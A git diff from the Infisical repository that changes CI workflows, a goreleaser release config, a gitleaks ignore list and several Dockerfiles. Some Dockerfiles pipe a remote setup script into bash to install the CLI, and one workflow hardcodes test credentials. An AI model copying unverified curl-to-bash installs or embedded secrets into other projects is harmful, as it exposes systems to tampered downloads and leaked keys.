--charts helm-charts/infisical-standalone-postgres \
--helm-extra-args="--timeout=300s" \
--helm-extra-set-args="--set ingress.nginx.enabled=false --set infisical.autoDatabaseSchemaMigration=false --set infisical.replicaCount=1 --set infisical.image.tag=v0.132.2-postgres --set infisical.autoBootstrap.enabled=true" \
--namespace infisical-standalone-postgres

View File

@@ -1,38 +0,0 @@
name: Run Helm Chart Tests for Secret Operator
on:
pull_request:
paths:
- "helm-charts/secrets-operator/**"
- ".github/workflows/run-helm-chart-tests-secret-operator.yml"
jobs:
test-helm:
name: Test Helm Chart
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
with:
fetch-depth: 0
- name: Set up Helm
uses: azure/setup-helm@v4.2.0
with:
version: v3.17.0
- uses: actions/setup-python@v5.3.0
with:
python-version: "3.x"
check-latest: true
- name: Set up chart-testing
uses: helm/chart-testing-action@v2.7.0
- name: Run chart-testing (lint)
run: ct lint --config ct.yaml --charts helm-charts/secrets-operator
- name: Create kind cluster
uses: helm/kind-action@v1.12.0
- name: Run chart-testing (install)
run: ct install --config ct.yaml --charts helm-charts/secrets-operator

View File

@@ -1,67 +0,0 @@
name: "Validate DB schemas"
on:
pull_request:
types: [opened, synchronize]
paths:
- "backend/**"
workflow_call:
jobs:
validate-db-schemas:
name: Validate DB schemas
runs-on: ubuntu-latest
timeout-minutes: 15
env:
NODE_OPTIONS: "--max-old-space-size=8192"
REDIS_URL: redis://172.17.0.1:6379
DB_CONNECTION_URI: postgres://infisical:infisical@172.17.0.1:5432/infisical?sslmode=disable
AUTH_SECRET: something-random
ENCRYPTION_KEY: 4bnfe4e407b8921c104518903515b218
steps:
- name: ☁️ Checkout source
uses: actions/checkout@v4
with:
fetch-depth: 0
- uses: KengoTODA/actions-setup-docker-compose@v1
if: ${{ env.ACT }}
name: Install `docker compose` for local simulations
with:
version: "2.14.2"
- name: 🔧 Setup Node 20
uses: actions/setup-node@v3
with:
node-version: "20"
cache: "npm"
cache-dependency-path: backend/package-lock.json
- name: Start PostgreSQL and Redis
run: touch .env && docker compose -f docker-compose.dev.yml up -d db redis
- name: Install dependencies
run: npm install
working-directory: backend
- name: Apply migrations
run: npm run migration:latest-dev
working-directory: backend
- name: Run schema generation
run: npm run generate:schema
working-directory: backend
- name: Check for schema changes
run: |
if ! git diff --exit-code --quiet src/db/schemas; then
echo "❌ Generated schemas differ from committed schemas!"
echo "Run 'npm run generate:schema' locally and commit the changes."
git diff src/db/schemas
exit 1
fi
echo "✅ Schemas are up to date"
working-directory: backend
- name: Cleanup
if: always()
run: |
docker compose -f "docker-compose.dev.yml" down

223
.goreleaser.yaml Normal file
View File

@@ -0,0 +1,223 @@
# This is an example .goreleaser.yml file with some sensible defaults.
# Make sure to check the documentation at https://goreleaser.com
# before:
# hooks:
# # You may remove this if you don't use go modules.
# - cd cli && go mod tidy
# # you may remove this if you don't need go generate
# - cd cli && go generate ./...
before:
hooks:
- ./cli/scripts/completions.sh
- ./cli/scripts/manpages.sh
monorepo:
tag_prefix: infisical-cli/
dir: cli
builds:
- id: darwin-build
binary: infisical
ldflags:
- -X github.com/Infisical/infisical-merge/packages/util.CLI_VERSION={{ .Version }}
- -X github.com/Infisical/infisical-merge/packages/telemetry.POSTHOG_API_KEY_FOR_CLI={{ .Env.POSTHOG_API_KEY_FOR_CLI }}
flags:
- -trimpath
env:
- CGO_ENABLED=1
- CC=/home/runner/work/osxcross/target/bin/o64-clang
- CXX=/home/runner/work/osxcross/target/bin/o64-clang++
goos:
- darwin
ignore:
- goos: darwin
goarch: "386"
dir: ./cli
- id: all-other-builds
env:
- CGO_ENABLED=0
binary: infisical
ldflags:
- -X github.com/Infisical/infisical-merge/packages/util.CLI_VERSION={{ .Version }}
- -X github.com/Infisical/infisical-merge/packages/telemetry.POSTHOG_API_KEY_FOR_CLI={{ .Env.POSTHOG_API_KEY_FOR_CLI }}
flags:
- -trimpath
goos:
- freebsd
- linux
- netbsd
- openbsd
- windows
goarch:
- "386"
- amd64
- arm
- arm64
goarm:
- "6"
- "7"
ignore:
- goos: windows
goarch: "386"
- goos: freebsd
goarch: "386"
dir: ./cli
archives:
- format_overrides:
- goos: windows
format: zip
files:
- ../README*
- ../LICENSE*
- ../manpages/*
- ../completions/*
release:
replace_existing_draft: true
mode: "replace"
checksum:
name_template: "checksums.txt"
snapshot:
name_template: "{{ .Version }}-devel"
# publishers:
# - name: fury.io
# ids:
# - infisical
# dir: "{{ dir .ArtifactPath }}"
# cmd: curl -F package=@{{ .ArtifactName }} https://{{ .Env.FURY_TOKEN }}@push.fury.io/infisical/
brews:
- name: infisical
tap:
owner: Infisical
name: homebrew-get-cli
commit_author:
name: "Infisical"
email: ai@infisical.com
folder: Formula
homepage: "https://infisical.com"
description: "The official Infisical CLI"
install: |-
bin.install "infisical"
bash_completion.install "completions/infisical.bash" => "infisical"
zsh_completion.install "completions/infisical.zsh" => "_infisical"
fish_completion.install "completions/infisical.fish"
man1.install "manpages/infisical.1.gz"
- name: "infisical@{{.Version}}"
tap:
owner: Infisical
name: homebrew-get-cli
commit_author:
name: "Infisical"
email: ai@infisical.com
folder: Formula
homepage: "https://infisical.com"
description: "The official Infisical CLI"
install: |-
bin.install "infisical"
bash_completion.install "completions/infisical.bash" => "infisical"
zsh_completion.install "completions/infisical.zsh" => "_infisical"
fish_completion.install "completions/infisical.fish"
man1.install "manpages/infisical.1.gz"
nfpms:
- id: infisical
package_name: infisical
builds:
- all-other-builds
vendor: Infisical, Inc
homepage: https://infisical.com/
maintainer: Infisical, Inc
description: The offical Infisical CLI
license: MIT
formats:
- rpm
- deb
- apk
- archlinux
bindir: /usr/bin
contents:
- src: ./completions/infisical.bash
dst: /etc/bash_completion.d/infisical
- src: ./completions/infisical.fish
dst: /usr/share/fish/vendor_completions.d/infisical.fish
- src: ./completions/infisical.zsh
dst: /usr/share/zsh/site-functions/_infisical
- src: ./manpages/infisical.1.gz
dst: /usr/share/man/man1/infisical.1.gz
scoop:
bucket:
owner: Infisical
name: scoop-infisical
commit_author:
name: "Infisical"
email: ai@infisical.com
homepage: "https://infisical.com"
description: "The official Infisical CLI"
license: MIT
aurs:
- name: infisical-bin
homepage: "https://infisical.com"
description: "The official Infisical CLI"
maintainers:
- Infisical, Inc <support@infisical.com>
license: MIT
private_key: "{{ .Env.AUR_KEY }}"
git_url: "ssh://aur@aur.archlinux.org/infisical-bin.git"
package: |-
# bin
install -Dm755 "./infisical" "${pkgdir}/usr/bin/infisical"
# license
install -Dm644 "./LICENSE" "${pkgdir}/usr/share/licenses/infisical/LICENSE"
# completions
mkdir -p "${pkgdir}/usr/share/bash-completion/completions/"
mkdir -p "${pkgdir}/usr/share/zsh/site-functions/"
mkdir -p "${pkgdir}/usr/share/fish/vendor_completions.d/"
install -Dm644 "./completions/infisical.bash" "${pkgdir}/usr/share/bash-completion/completions/infisical"
install -Dm644 "./completions/infisical.zsh" "${pkgdir}/usr/share/zsh/site-functions/_infisical"
install -Dm644 "./completions/infisical.fish" "${pkgdir}/usr/share/fish/vendor_completions.d/infisical.fish"
# man pages
install -Dm644 "./manpages/infisical.1.gz" "${pkgdir}/usr/share/man/man1/infisical.1.gz"
dockers:
- dockerfile: docker/alpine
goos: linux
goarch: amd64
use: buildx
ids:
- all-other-builds
image_templates:
- "infisical/cli:{{ .Major }}.{{ .Minor }}.{{ .Patch }}-amd64"
- "infisical/cli:latest-amd64"
build_flag_templates:
- "--pull"
- "--platform=linux/amd64"
- dockerfile: docker/alpine
goos: linux
goarch: amd64
use: buildx
ids:
- all-other-builds
image_templates:
- "infisical/cli:{{ .Major }}.{{ .Minor }}.{{ .Patch }}-arm64"
- "infisical/cli:latest-arm64"
build_flag_templates:
- "--pull"
- "--platform=linux/arm64"
docker_manifests:
- name_template: "infisical/cli:{{ .Major }}.{{ .Minor }}.{{ .Patch }}"
image_templates:
- "infisical/cli:{{ .Major }}.{{ .Minor }}.{{ .Patch }}-amd64"
- "infisical/cli:{{ .Major }}.{{ .Minor }}.{{ .Patch }}-arm64"
- name_template: "infisical/cli:latest"
image_templates:
- "infisical/cli:latest-amd64"
- "infisical/cli:latest-arm64"

View File

@@ -8,45 +8,3 @@ frontend/src/views/Project/MembersPage/components/MemberListTab/MemberRoleForm/S
docs/mint.json:generic-api-key:651
backend/src/ee/services/hsm/hsm-service.ts:generic-api-key:134
docs/documentation/platform/audit-log-streams/audit-log-streams.mdx:generic-api-key:104
docs/cli/commands/bootstrap.mdx:jwt:86
docs/documentation/platform/audit-log-streams/audit-log-streams.mdx:generic-api-key:102
docs/self-hosting/guides/automated-bootstrapping.mdx:jwt:74
frontend/src/pages/secret-manager/SecretDashboardPage/components/SecretListView/SecretDetailSidebar.tsx:generic-api-key:72
k8-operator/config/samples/crd/pushsecret/source-secret-with-templating.yaml:private-key:11
k8-operator/config/samples/crd/pushsecret/push-secret-with-template.yaml:private-key:52
backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-types.ts:generic-api-key:125
frontend/src/components/permissions/AccessTree/nodes/RoleNode.tsx:generic-api-key:67
frontend/src/components/secret-rotations-v2/RotateSecretRotationV2Modal.tsx:generic-api-key:14
frontend/src/components/secret-rotations-v2/SecretRotationV2StatusBadge.tsx:generic-api-key:11
frontend/src/components/secret-rotations-v2/ViewSecretRotationV2GeneratedCredentials/ViewSecretRotationV2GeneratedCredentials.tsx:generic-api-key:23
frontend/src/hooks/api/secretRotationsV2/types/index.ts:generic-api-key:28
frontend/src/hooks/api/secretRotationsV2/types/index.ts:generic-api-key:65
frontend/src/pages/secret-manager/SecretDashboardPage/components/SecretRotationListView/SecretRotationItem.tsx:generic-api-key:26
docs/documentation/platform/kms/overview.mdx:generic-api-key:281
docs/documentation/platform/kms/overview.mdx:generic-api-key:344
frontend/src/pages/secret-manager/OverviewPage/components/SecretOverviewTableRow/SecretOverviewTableRow.tsx:generic-api-key:85
docs/cli/commands/user.mdx:generic-api-key:51
frontend/src/pages/secret-manager/OverviewPage/components/SecretOverviewTableRow/SecretOverviewTableRow.tsx:generic-api-key:76
docs/integrations/app-connections/hashicorp-vault.mdx:generic-api-key:188
cli/detect/config/gitleaks.toml:gcp-api-key:567
cli/detect/config/gitleaks.toml:gcp-api-key:569
cli/detect/config/gitleaks.toml:gcp-api-key:570
cli/detect/config/gitleaks.toml:gcp-api-key:572
cli/detect/config/gitleaks.toml:gcp-api-key:574
cli/detect/config/gitleaks.toml:gcp-api-key:575
cli/detect/config/gitleaks.toml:gcp-api-key:576
cli/detect/config/gitleaks.toml:gcp-api-key:577
cli/detect/config/gitleaks.toml:gcp-api-key:578
cli/detect/config/gitleaks.toml:gcp-api-key:579
cli/detect/config/gitleaks.toml:gcp-api-key:581
cli/detect/config/gitleaks.toml:gcp-api-key:582
.github/workflows/run-helm-chart-tests-infisical-standalone-postgres.yml:generic-api-key:51
.github/workflows/run-helm-chart-tests-infisical-standalone-postgres.yml:generic-api-key:50
.github/workflows/helm-release-infisical-core.yml:generic-api-key:48
.github/workflows/helm-release-infisical-core.yml:generic-api-key:47
backend/src/services/smtp/smtp-service.ts:generic-api-key:79
frontend/src/components/secret-syncs/forms/SecretSyncDestinationFields/CloudflarePagesSyncFields.tsx:cloudflare-api-key:7
docs/integrations/app-connections/zabbix.mdx:generic-api-key:91
docs/integrations/app-connections/bitbucket.mdx:generic-api-key:123
docs/integrations/app-connections/railway.mdx:generic-api-key:156
.github/workflows/validate-db-schemas.yml:generic-api-key:21

View File

@@ -19,7 +19,7 @@ WORKDIR /app
# Copy dependencies
COPY --from=frontend-dependencies /app/node_modules ./node_modules
# Copy all files
# Copy all files
COPY /frontend .
ENV NODE_ENV production
@@ -32,9 +32,7 @@ ENV VITE_INTERCOM_ID $INTERCOM_ID
ARG INFISICAL_PLATFORM_VERSION
ENV VITE_INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION
ARG CAPTCHA_SITE_KEY
ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY
ENV NODE_OPTIONS="--max-old-space-size=8192"
ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY
# Build
RUN npm run build
@@ -117,12 +115,6 @@ FROM base AS production
# Install necessary packages including ODBC
RUN apt-get update && apt-get install -y \
build-essential \
autoconf \
automake \
libtool \
wget \
libssl-dev \
ca-certificates \
curl \
git \
@@ -140,22 +132,9 @@ RUN apt-get update && apt-get install -y \
# Configure ODBC in production
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsS.so\nFileUsage = 1\n" > /etc/odbcinst.ini
WORKDIR /openssl-build
RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \
&& tar -xf openssl-3.1.2.tar.gz \
&& cd openssl-3.1.2 \
&& ./Configure enable-fips \
&& make \
&& make install_fips \
&& cd / \
&& rm -rf /openssl-build \
&& apt-get clean \
&& rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
# Install Infisical CLI
RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \
&& apt-get update && apt-get install -y infisical=0.41.89 \
RUN curl -1sLf 'https://dl.cloudsmith.io/public/infisical/infisical-cli/setup.deb.sh' | bash \
&& apt-get update && apt-get install -y infisical=0.31.1 \
&& rm -rf /var/lib/apt/lists/*
RUN groupadd -r -g 1001 nodejs && useradd -r -u 1001 -g nodejs non-root-user
@@ -176,29 +155,19 @@ ENV INTERCOM_ID=$INTERCOM_ID
ARG CAPTCHA_SITE_KEY
ENV CAPTCHA_SITE_KEY=$CAPTCHA_SITE_KEY
WORKDIR /
WORKDIR /
COPY --from=backend-runner /app /backend
COPY --from=frontend-runner /app ./backend/frontend-build
ARG INFISICAL_PLATFORM_VERSION
ENV INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION
ENV PORT 8080
ENV HOST=0.0.0.0
ENV HTTPS_ENABLED false
ENV HTTPS_ENABLED false
ENV NODE_ENV production
ENV STANDALONE_BUILD true
ENV STANDALONE_BUILD true
ENV STANDALONE_MODE true
ENV ChrystokiConfigurationPath=/usr/safenet/lunaclient/
ENV NODE_OPTIONS="--max-old-space-size=8192 --force-fips"
# FIPS mode of operation:
ENV OPENSSL_CONF=/backend/nodejs.fips.cnf
ENV OPENSSL_MODULES=/usr/local/lib/ossl-modules
ENV FIPS_ENABLED=true
WORKDIR /backend
@@ -207,15 +176,6 @@ ENV TELEMETRY_ENABLED true
EXPOSE 8080
EXPOSE 443
# Remove telemetry. dd-trace uses BullMQ with MD5 hashing, which breaks when FIPS mode is enabled.
RUN grep -v 'import "./lib/telemetry/instrumentation.mjs";' dist/main.mjs > dist/main.mjs.tmp && \
mv dist/main.mjs.tmp dist/main.mjs
# The OpenSSL library is installed in different locations in different architectures (x86_64 and arm64).
# This is a workaround to avoid errors when the library is not found.
RUN ln -sf /usr/local/lib64/ossl-modules /usr/local/lib/ossl-modules || \
ln -sf /usr/local/lib/ossl-modules /usr/local/lib64/ossl-modules
USER non-root-user
CMD ["./standalone-entrypoint.sh"]
CMD ["./standalone-entrypoint.sh"]

View File

@@ -3,10 +3,13 @@ ARG POSTHOG_API_KEY=posthog-api-key
ARG INTERCOM_ID=intercom-id
ARG CAPTCHA_SITE_KEY=captcha-site-key
FROM node:20-slim AS base
FROM node:20-alpine AS base
FROM base AS frontend-dependencies
# Check https://github.com/nodejs/docker-node/tree/b4117f9333da4138b03a546ec926ef50a31506c3#nodealpine to understand why libc6-compat might be needed.
RUN apk add --no-cache libc6-compat
WORKDIR /app
COPY frontend/package.json frontend/package-lock.json ./
@@ -20,7 +23,7 @@ WORKDIR /app
# Copy dependencies
COPY --from=frontend-dependencies /app/node_modules ./node_modules
# Copy all files
# Copy all files
COPY /frontend .
ENV NODE_ENV production
@@ -33,8 +36,7 @@ ENV VITE_INTERCOM_ID $INTERCOM_ID
ARG INFISICAL_PLATFORM_VERSION
ENV VITE_INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION
ARG CAPTCHA_SITE_KEY
ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY
ENV NODE_OPTIONS="--max-old-space-size=8192"
ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY
# Build
RUN npm run build
@@ -43,8 +45,8 @@ RUN npm run build
FROM base AS frontend-runner
WORKDIR /app
RUN groupadd --system --gid 1001 nodejs
RUN useradd --system --uid 1001 --gid nodejs non-root-user
RUN addgroup --system --gid 1001 nodejs
RUN adduser --system --uid 1001 non-root-user
COPY --from=frontend-builder --chown=non-root-user:nodejs /app/dist ./
@@ -54,23 +56,21 @@ USER non-root-user
## BACKEND
##
FROM base AS backend-build
RUN addgroup --system --gid 1001 nodejs \
&& adduser --system --uid 1001 non-root-user
WORKDIR /app
# Install all required dependencies for build
RUN apt-get update && apt-get install -y \
RUN apk --update add \
python3 \
make \
g++ \
unixodbc \
freetds-bin \
freetds \
unixodbc-dev \
libc-dev \
freetds-dev \
&& rm -rf /var/lib/apt/lists/*
RUN groupadd --system --gid 1001 nodejs
RUN useradd --system --uid 1001 --gid nodejs non-root-user
freetds-dev
COPY backend/package*.json ./
RUN npm ci --only-production
@@ -78,7 +78,6 @@ RUN npm ci --only-production
COPY /backend .
COPY --chown=non-root-user:nodejs standalone-entrypoint.sh standalone-entrypoint.sh
RUN npm i -D tsconfig-paths
ENV NODE_OPTIONS="--max-old-space-size=8192"
RUN npm run build
# Production stage
@@ -87,19 +86,18 @@ FROM base AS backend-runner
WORKDIR /app
# Install all required dependencies for runtime
RUN apt-get update && apt-get install -y \
RUN apk --update add \
python3 \
make \
g++ \
unixodbc \
freetds-bin \
freetds \
unixodbc-dev \
libc-dev \
freetds-dev \
&& rm -rf /var/lib/apt/lists/*
freetds-dev
# Configure ODBC
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsS.so\nFileUsage = 1\n" > /etc/odbcinst.ini
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/libtdsodbc.so\nSetup = /usr/lib/libtdsodbc.so\nFileUsage = 1\n" > /etc/odbcinst.ini
COPY backend/package*.json ./
RUN npm ci --only-production
@@ -111,36 +109,34 @@ RUN mkdir frontend-build
# Production stage
FROM base AS production
RUN apt-get update && apt-get install -y \
ca-certificates \
bash \
curl \
git \
RUN apk add --upgrade --no-cache ca-certificates
RUN apk add --no-cache bash curl && curl -1sLf \
'https://dl.cloudsmith.io/public/infisical/infisical-cli/setup.alpine.sh' | bash \
&& apk add infisical=0.31.1 && apk add --no-cache git
WORKDIR /
# Install all required runtime dependencies
RUN apk --update add \
python3 \
make \
g++ \
unixodbc \
freetds-bin \
freetds \
unixodbc-dev \
libc-dev \
freetds-dev \
wget \
openssh-client \
&& rm -rf /var/lib/apt/lists/*
# Install Infisical CLI
RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \
&& apt-get update && apt-get install -y infisical=0.41.89 \
&& rm -rf /var/lib/apt/lists/*
WORKDIR /
bash \
curl \
git \
openssh
# Configure ODBC in production
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsS.so\nFileUsage = 1\n" > /etc/odbcinst.ini
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/libtdsodbc.so\nSetup = /usr/lib/libtdsodbc.so\nFileUsage = 1\n" > /etc/odbcinst.ini
# Setup user permissions
RUN groupadd --system --gid 1001 nodejs \
&& useradd --system --uid 1001 --gid nodejs non-root-user
RUN addgroup --system --gid 1001 nodejs \
&& adduser --system --uid 1001 non-root-user
# Give non-root-user permission to update SSL certs
RUN chown -R non-root-user /etc/ssl/certs
@@ -158,20 +154,18 @@ ENV INTERCOM_ID=$INTERCOM_ID
ARG CAPTCHA_SITE_KEY
ENV CAPTCHA_SITE_KEY=$CAPTCHA_SITE_KEY
COPY --from=backend-runner /app /backend
COPY --from=frontend-runner /app ./backend/frontend-build
ARG INFISICAL_PLATFORM_VERSION
ENV INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION
ENV PORT 8080
ENV HOST=0.0.0.0
ENV HTTPS_ENABLED false
ENV HTTPS_ENABLED false
ENV NODE_ENV production
ENV STANDALONE_BUILD true
ENV STANDALONE_BUILD true
ENV STANDALONE_MODE true
ENV NODE_OPTIONS="--max-old-space-size=1024"
WORKDIR /backend
ENV TELEMETRY_ENABLED true

View File

@@ -50,7 +50,7 @@ We're on a mission to make security tooling more accessible to everyone, not jus
- **[Dashboard](https://infisical.com/docs/documentation/platform/project)**: Manage secrets across projects and environments (e.g. development, production, etc.) through a user-friendly interface.
- **[Native Integrations](https://infisical.com/docs/integrations/overview)**: Sync secrets to platforms like [GitHub](https://infisical.com/docs/integrations/cicd/githubactions), [Vercel](https://infisical.com/docs/integrations/cloud/vercel), [AWS](https://infisical.com/docs/integrations/cloud/aws-secret-manager), and use tools like [Terraform](https://infisical.com/docs/integrations/frameworks/terraform), [Ansible](https://infisical.com/docs/integrations/platforms/ansible), and more.
- **[Secret versioning](https://infisical.com/docs/documentation/platform/secret-versioning)** and **[Point-in-Time Recovery](https://infisical.com/docs/documentation/platform/pit-recovery)**: Keep track of every secret and project state; roll back when needed.
- **[Secret Rotation](https://infisical.com/docs/documentation/platform/secret-rotation/overview)**: Rotate secrets at regular intervals for services like [PostgreSQL](https://infisical.com/docs/documentation/platform/secret-rotation/postgres-credentials), [MySQL](https://infisical.com/docs/documentation/platform/secret-rotation/mysql), [AWS IAM](https://infisical.com/docs/documentation/platform/secret-rotation/aws-iam), and more.
- **[Secret Rotation](https://infisical.com/docs/documentation/platform/secret-rotation/overview)**: Rotate secrets at regular intervals for services like [PostgreSQL](https://infisical.com/docs/documentation/platform/secret-rotation/postgres), [MySQL](https://infisical.com/docs/documentation/platform/secret-rotation/mysql), [AWS IAM](https://infisical.com/docs/documentation/platform/secret-rotation/aws-iam), and more.
- **[Dynamic Secrets](https://infisical.com/docs/documentation/platform/dynamic-secrets/overview)**: Generate ephemeral secrets on-demand for services like [PostgreSQL](https://infisical.com/docs/documentation/platform/dynamic-secrets/postgresql), [MySQL](https://infisical.com/docs/documentation/platform/dynamic-secrets/mysql), [RabbitMQ](https://infisical.com/docs/documentation/platform/dynamic-secrets/rabbit-mq), and more.
- **[Secret Scanning and Leak Prevention](https://infisical.com/docs/cli/scanning-overview)**: Prevent secrets from leaking to git.
- **[Infisical Kubernetes Operator](https://infisical.com/docs/documentation/getting-started/kubernetes)**: Deliver secrets to your Kubernetes workloads and automatically reload deployments.
@@ -149,8 +149,11 @@ Not sure where to get started? You can:
- Join our <a href="https://infisical.com/slack">Slack</a>, and ask us any questions there.
## We are hiring!
## Resources
If you're reading this, there is a strong chance you like the products we created.
You might also make a great addition to our team. We're growing fast and would love for you to [join us](https://infisical.com/careers).
- [Docs](https://infisical.com/docs/documentation/getting-started/introduction) for comprehensive documentation and guides
- [Slack](https://infisical.com/slack) for discussion with the community and Infisical team.
- [GitHub](https://github.com/Infisical/infisical) for code, issues, and pull requests
- [Twitter](https://twitter.com/infisical) for fast news
- [YouTube](https://www.youtube.com/@infisical_os) for videos on secret management
- [Blog](https://infisical.com/blog) for secret management insights, articles, tutorials, and updates

View File

@@ -69,15 +69,6 @@ module.exports = {
["^\\."]
]
}
],
"import/extensions": [
"error",
"ignorePackages",
{
"": "never", // this is required to get the .tsx to work...
ts: "never",
tsx: "never"
}
]
}
};

View File

@@ -1,23 +1,23 @@
# Build stage
FROM node:20-slim AS build
FROM node:20-alpine AS build
WORKDIR /app
# Required for pkcs11js
RUN apt-get update && apt-get install -y \
python3 \
make \
g++ \
openssh-client \
openssl
RUN apk --update add \
python3 \
make \
g++ \
openssh
# Install dependencies for TDS driver (required for SAP ASE dynamic secrets)
RUN apt-get install -y \
# install dependencies for TDS driver (required for SAP ASE dynamic secrets)
RUN apk add --no-cache \
unixodbc \
freetds-bin \
freetds-dev \
freetds \
unixodbc-dev \
libc-dev
libc-dev \
freetds-dev
COPY package*.json ./
RUN npm ci --only-production
@@ -26,39 +26,39 @@ COPY . .
RUN npm run build
# Production stage
FROM node:20-slim
FROM node:20-alpine
WORKDIR /app
ENV npm_config_cache /home/node/.npm
COPY package*.json ./
RUN apt-get update && apt-get install -y \
python3 \
make \
g++
RUN apk --update add \
python3 \
make \
g++
# Install dependencies for TDS driver (required for SAP ASE dynamic secrets)
RUN apt-get install -y \
# install dependencies for TDS driver (required for SAP ASE dynamic secrets)
RUN apk add --no-cache \
unixodbc \
freetds-bin \
freetds-dev \
freetds \
unixodbc-dev \
libc-dev
libc-dev \
freetds-dev
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nFileUsage = 1\n" > /etc/odbcinst.ini
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/libtdsodbc.so\nSetup = /usr/lib/libtdsodbc.so\nFileUsage = 1\n" > /etc/odbcinst.ini
RUN npm ci --only-production && npm cache clean --force
COPY --from=build /app .
# Install Infisical CLI
RUN apt-get install -y curl bash && \
curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \
apt-get update && apt-get install -y infisical=0.41.89 git
RUN apk add --no-cache bash curl && curl -1sLf \
'https://dl.cloudsmith.io/public/infisical/infisical-cli/setup.alpine.sh' | bash \
&& apk add infisical=0.8.1 && apk add --no-cache git
HEALTHCHECK --interval=10s --timeout=3s --start-period=10s \
CMD node healthcheck.js
HEALTHCHECK --interval=10s --timeout=3s --start-period=10s \
CMD node healthcheck.js
ENV HOST=0.0.0.0

View File

@@ -1,4 +1,4 @@
FROM node:20-slim
FROM node:20-alpine
# ? Setup a test SoftHSM module. In production a real HSM is used.
@@ -7,33 +7,32 @@ ARG SOFTHSM2_VERSION=2.5.0
ENV SOFTHSM2_VERSION=${SOFTHSM2_VERSION} \
SOFTHSM2_SOURCES=/tmp/softhsm2
# Install build dependencies including python3 (required for pkcs11js and partially TDS driver)
RUN apt-get update && apt-get install -y \
build-essential \
autoconf \
automake \
git \
libtool \
libssl-dev \
python3 \
make \
g++ \
openssh-client \
openssl \
curl \
pkg-config
# install build dependencies including python3 (required for pkcs11js and partially TDS driver)
RUN apk --update add \
alpine-sdk \
autoconf \
automake \
git \
libtool \
openssl-dev \
python3 \
make \
g++ \
openssh
# Install dependencies for TDS driver (required for SAP ASE dynamic secrets)
RUN apt-get install -y \
# install dependencies for TDS driver (required for SAP ASE dynamic secrets)
RUN apk add --no-cache \
unixodbc \
freetds \
unixodbc-dev \
freetds-dev \
freetds-bin \
tdsodbc
libc-dev \
freetds-dev
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nFileUsage = 1\n" > /etc/odbcinst.ini
# Build and install SoftHSM2
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/libtdsodbc.so\nSetup = /usr/lib/libtdsodbc.so\nFileUsage = 1\n" > /etc/odbcinst.ini
# build and install SoftHSM2
RUN git clone https://github.com/opendnssec/SoftHSMv2.git ${SOFTHSM2_SOURCES}
WORKDIR ${SOFTHSM2_SOURCES}
@@ -46,18 +45,16 @@ RUN git checkout ${SOFTHSM2_VERSION} -b ${SOFTHSM2_VERSION} \
WORKDIR /root
RUN rm -fr ${SOFTHSM2_SOURCES}
# Install pkcs11-tool
RUN apt-get install -y opensc
# install pkcs11-tool
RUN apk --update add opensc
RUN mkdir -p /etc/softhsm2/tokens && \
softhsm2-util --init-token --slot 0 --label "auth-app" --pin 1234 --so-pin 0000
RUN softhsm2-util --init-token --slot 0 --label "auth-app" --pin 1234 --so-pin 0000
# ? App setup
# Install Infisical CLI
RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \
apt-get update && \
apt-get install -y infisical=0.41.89
RUN apk add --no-cache bash curl && curl -1sLf \
'https://dl.cloudsmith.io/public/infisical/infisical-cli/setup.alpine.sh' | bash \
&& apk add infisical=0.8.1 && apk add --no-cache git
WORKDIR /app

View File

@@ -1,90 +0,0 @@
FROM node:20-slim
# ? Setup a test SoftHSM module. In production a real HSM is used.
ARG SOFTHSM2_VERSION=2.5.0
ENV SOFTHSM2_VERSION=${SOFTHSM2_VERSION} \
SOFTHSM2_SOURCES=/tmp/softhsm2
# Install build dependencies including python3 (required for pkcs11js and partially TDS driver)
RUN apt-get update && apt-get install -y \
build-essential \
autoconf \
automake \
git \
libtool \
libssl-dev \
python3 \
make \
g++ \
openssh-client \
curl \
pkg-config \
perl \
wget
# Install dependencies for TDS driver (required for SAP ASE dynamic secrets)
RUN apt-get install -y \
unixodbc \
unixodbc-dev \
freetds-dev \
freetds-bin \
tdsodbc
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nFileUsage = 1\n" > /etc/odbcinst.ini
# Build and install SoftHSM2
RUN git clone https://github.com/opendnssec/SoftHSMv2.git ${SOFTHSM2_SOURCES}
